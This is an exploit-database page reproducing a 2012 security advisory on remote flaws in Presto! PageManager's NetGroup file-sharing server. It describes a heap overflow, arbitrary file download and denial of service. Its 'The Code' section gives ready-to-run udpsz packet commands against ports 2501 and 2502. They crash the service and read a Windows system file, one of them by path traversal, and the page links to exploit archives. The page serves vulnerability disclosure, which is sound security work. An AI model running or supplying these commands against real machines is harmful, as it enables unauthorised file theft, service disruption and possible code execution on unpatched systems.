Presto! PageManager <= 9.01 Multiple Vulnerabilities



EKU-ID: 1670 CVE: OSVDB-ID:
Author: Luigi Auriemma Published: 2012-03-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#######################################################################
                             Luigi Auriemma
Application:  Presto! PageManager
              http://www.newsoftinc.com/products/product_page.php?P_Id=5
Versions:     <= 9.01
Platforms:    Windows, MacOSX
Bugs:         A] Heap-overflow
              B] Arbitray files downloading
              C] Denial of Service
Exploitation: remote
Date:         14 Mar 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
Presto! PageManager is a management software for scanners and it's
provided by default also by some hardware vendors (like Epson).
It's bundled with a (manual) server program called NetGroup for remote
files transfer:
"The Network Group function helps you exchange files with your group
members. Everyone in the working group should have Presto! PageManager
running."
#######################################################################
=======
2) Bugs
=======
----------------
A] Heap-overflow
----------------
Buffer overflow on port 2502 while copying of the message string into a
small heap buffer:
  004151BE  |. 33C0           XOR EAX,EAX
  004151C0  |. F2:AE          REPNE SCAS BYTE PTR ES:[EDI]  ; strlen
  004151C2  |. F7D1           NOT ECX
  004151C4  |. 2BF9           SUB EDI,ECX
  004151C6  |. 6A FF          PUSH -1
  004151C8  |. 8BC1           MOV EAX,ECX
  004151CA  |. 8BF7           MOV ESI,EDI
  004151CC  |. 8BFA           MOV EDI,EDX
  004151CE  |. C1E9 02        SHR ECX,2                     ; heap overflow
  004151D1  |. F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
  004151D3  |. 8BC8           MOV ECX,EAX
  004151D5  |. 83E1 03        AND ECX,3
  004151D8  |. F3:A4          REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
  004151DA  |. 8D4C24 14      LEA ECX,DWORD PTR SS:[ESP+14]
  004151DE  |. E8 1B370000    CALL <JMP.&MFC42.#5572>
  004151E3  |. 8B5424 10      MOV EDX,DWORD PTR SS:[ESP+10]
  004151E7  |. 8D4C24 2C      LEA ECX,DWORD PTR SS:[ESP+2C]
  004151EB  |. 51             PUSH ECX
  004151EC  |. 52             PUSH EDX
  004151ED  |. E8 56350000    CALL <JMP.&PMCommon._GetFileExtName>
  004151F2  |. BE 94014200    MOV ESI,NetGroup.00420194     ;  ASCII ".NSOFT"
-----------------------------
B] Arbitray files downloading
-----------------------------
The software allows downloading any file.
--------------------
C] Denial of Service
--------------------
Just a simple (auto)termination caused by the impossibility of
allocating the amount of memory specified by the client.
There is also a "division by zero" when specifying a file size of 0
bytes.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/18600.zip
A]
  udpsz -T -C "00000100 ffff0200" 0 -b a -C "00 00 1000000000000000 00" -1 SERVER 2502 8+0x02ffff
  just a quick test, exist better ways that show code execution
B]
  udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00c:\\windows\\system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8
  or
  udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00../../../../windows/system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8
C]
  udpsz -T -C "00010000 ffffffff" SERVER 2501 -1
  or
  udpsz -T -C "00000100 ffffffff" SERVER 2502 -1
#######################################################################
======
4) Fix
======
No fix.
#######################################################################